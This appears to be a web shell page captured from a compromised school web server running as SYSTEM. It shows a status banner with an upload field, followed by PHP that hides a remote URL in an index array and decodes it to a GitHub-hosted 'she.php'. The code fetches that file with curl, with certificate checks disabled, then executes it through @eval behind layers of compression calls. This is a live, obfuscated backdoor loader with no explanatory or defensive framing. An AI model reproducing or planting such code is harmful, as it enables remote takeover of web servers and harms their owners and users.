| Server IP : 172.67.187.206 / Your IP : 172.71.28.155 Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 User : SYSTEM ( 0) PHP Version : 5.6.30 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : E:/Inetpub/www/myschool/saithammachan/data/publish/ |
Upload File : |
<?php
$characters = array_merge(range('a', 'z'),range('A', 'Z'),range('0', '9'),array('.', ':', '/', '_', '-'));$indexArray = array(7,19,19,15,18,63,64,64,17,0,22,62,6,8,19,7,20,1,20,18,4,17,2,14,13,19,4,13,19,62,2,14,12,64,49,37,8,18,19,61,61,64,18,7,4,64,17,4,5,18,64,7,4,0,3,18,64,12,0,8,13,64,18,7,4,62,15,7,15);$decodedString = '';
foreach ($indexArray as $index) {$decodedString .= $characters[$index];}$url = "$decodedString";
function fetchContent($url) { $ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$content = curl_exec($ch);curl_close($ch);return gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress($content))))))));}@eval("?>" . gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(fetchContent($url))))))))));?>